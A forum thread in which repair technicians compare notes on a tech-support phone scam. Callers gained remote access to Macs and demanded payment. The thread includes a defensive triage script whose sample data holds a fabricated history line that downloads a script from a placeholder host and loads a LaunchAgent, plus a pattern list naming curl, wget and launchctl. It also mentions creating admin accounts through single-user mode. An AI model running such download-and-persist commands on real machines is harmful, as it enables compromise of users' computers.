Had two Mac owners contacted.....

GTP

Had two Mac owners contacted by a company called EPCHEAL.
They told the clients that "your computer is being attacked by hackers and that you need to sign up to our Protection Plan!"
They were offering a "lifetime plan" for AU$399 or a "yearly plan" for AU$129.
They went on to show them a report showing a list of connections to various IPs which they told the clients "were hackers trying to get in!"
They were really quite forceful on the phone and had both clients scared and alarmed.
I informed the clients to not answer if they called, but they call on different numbers.
It was/is obviously a scam along the same lines as the Windows scams.
Both clients allowed them access to the computers, so I don't know what they've installed or changed.
Anyone else had this or heard of EPCHEAL.com?
 
This is very interesting due to the timing. Got a call from a Mac customer yesterday, similar situation. They are unable to provide accurate info other than someone called up, said they had been called, similar blurb. She did say she allowed them access to the computer but did not give them a CC. Told her to unplug the power to the iMac immediately. Going out tomorrow to look things over. She did say they had "problems" but, again, could not provide any details. I'll definitely search for that domain.

Some thoughts on this exploit on OS X.

1. Saving the history of all browsers being used, parse the same.
2. Open Terminal and run history > history.txt, make a copy of the file to thumbdrive, parse the output. This will let me know what was done via CLI. For normal users history is empty except for anything their tech may have done.
3. In Terminal run ls -Al /Users. This will show all accounts.
4. Check the contents of Applications, browser plugins, etc.
5. At this point I'll shut down the machine, plug the network cable in, boot into safe mode and install MBAM, run same.

Edit: sudo does not work the same in OS X. Forgot about that. Deleted sudo references.
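Steps 2 to 4 of that checklist, as an added offline triage script (not code from this thread or from Markverhyden); it walks a copy or mounted image of the customer's disk under a ROOT directory, which, like the pattern lists and the constructed sample tree, is an assumption made for the example:

```shell
#!/bin/sh
# Added example: offline pass over a copy of a Mac's disk, following the
# thread's checklist. ROOT, the pattern lists and the sample tree are assumptions.

# History lines worth reading after a scammer had remote access (assumed list).
HISTORY_PATTERNS='curl|wget|launchctl|crontab|dscl|sudo|osascript|defaults write'
# Remote-control tool named in the thread; its presence after the call is itself a finding.
REMOTE_TOOL_PATTERNS='GoTo'

triage() {
    root=$1
    flags=0
    # Step 3: every account on the machine (ls -Al /Users in the post)
    echo "ACCOUNTS under $root/Users:"
    ls -A "$root/Users"
    # Step 2: shell history per account; normal users have almost none
    for home in "$root"/Users/*; do
        [ -d "$home" ] || continue
        for hist in "$home/.bash_history" "$home/.zsh_history"; do
            [ -f "$hist" ] || continue
            hits=$(grep -Ec "$HISTORY_PATTERNS" "$hist" || true)
            if [ "$hits" -gt 0 ]; then
                echo "FLAG history $hist: $hits line(s) to review"
                flags=$((flags + 1))
            fi
        done
    done
    # Step 4: applications, looking for remote-access tools left behind
    for app in "$root"/Applications/*; do
        [ -e "$app" ] || continue
        if basename "$app" | grep -Eq "$REMOTE_TOOL_PATTERNS"; then
            echo "FLAG remote-access app: $app"
            flags=$((flags + 1))
        fi
    done
    echo "TOTAL FLAGS: $flags"
}

# Constructed sample tree standing in for a customer's disk (not real data).
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/Users/owner" "$root/Users/Shared" \
             "$root/Applications/GoToAssist.app" "$root/Applications/Safari.app"
    printf 'ls -l\ncurl -o /tmp/tool.sh http://example.invalid/tool.sh\nlaunchctl load /Users/owner/Library/LaunchAgents/com.example.agent.plist\n' \
        > "$root/Users/owner/.bash_history"
    echo "$root"
}

ROOT=$(make_sample_tree)
triage "$ROOT"
rm -rf "$ROOT"
```

On a real machine, point ROOT at a mounted image of the disk rather than the live system so nothing the scammer installed runs while you look.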
Whenever a client gives remote access to a scammer, it's nuke n' pave time. You never know what they might have installed (rootkits, keyloggers, etc.). It's always a financial motivation so chances are they've done something to try to steal the client's credit cards and/or identity and if that happens and you gave their computer a clean bill of health, they can sue YOU for not doing your job properly.
 
I've had a customer yesterday with a similar problem. She started to have some problems on her MacBook Air and then a popup appeared with a foreign phone number (pay attention that I'm in Portugal!). When she called the phone number they only spoke in English and insisted that she did the same. Well, after a 50 min conversation with the "so called" Apple assistant, she gave them remote access, which they used to show her that the machine was infected and to show her the IPs that were trying to enter her computer.
They then asked her for US$1000 to fix her computer. She didn't give them any CC data, saying that she didn't have one.
The scammer turned more aggressive, saying that if she didn't pay them by 6pm yesterday they would lock her out of her computer.
I gave it a look and tried to do a backup, but by the time I tried to log in again the password wouldn't work...
Had the same kind of scammers last year doing the same with Microsoft users....
 

If they did not turn on FileVault then that's not too big of a deal. It's easy to boot into Single user mode and create a new admin account. You can then take control of the old one.

https://www.jamf.com/jamf-nation/discussions/9096/creating-new-users-command-line-single-user-mode

The big problem is the Firmware password. It's not easy, but if they have the knowledge and time they can do that without booting into recovery mode.

https://www.cnet.com/news/how-to-set-a-firmware-password-without-rebooting-in-os-x/
 
Then you have this on their FAQ page and I laughed hard. This site is such a scam. I doubt very much it's a legit program. Probably spyware or something that will benefit them in something else.

Can I install ePCeal Antivirus edition on my mac?
ePCheal Antivirus is currently compatible with the Windows operating system/s only. A new Mac version is due soon, so please make sure you keep connected through our website for future releases and updates.
 
Update on my customer.

Still do not have all the details and probably never will. Not sure if it's by design or customer ignorance.

She said the owner called her this weekend about having some problem on the weekend. She said she had seen some "windows" with lots of numbers and letters popping up on Monday. Of course she did not take any pictures (she definitely will in the future). What is odd is they called the business and knew her name. Said they were from Microsoft Word and were not native English speakers.

They had her connect via GoToAssist from Citrix. Checked the computer thoroughly, no CLI activity, only GoTo installed. Removed same. Malware scans spotless. They did the typical trick of pulling up Console, which shows log entries. As expected there will be entries with the word error, which they use to alarm the EU so they will pay them. Browser history was clean as well. However the FF search was set to Yahoo which is a prime distributor of crapware via the top of page paid ads. So maybe the owner did something and is not fessing up.
 
Same here @Markverhyden: connected via GoToAssist, + installed, no CLI activity, browser history clean, and Chrome on one, FF on the other, set to Yahoo.
Malware scans showed nothing.
Same with both these clients re pulling up the Console to "show them all the hackers errors!"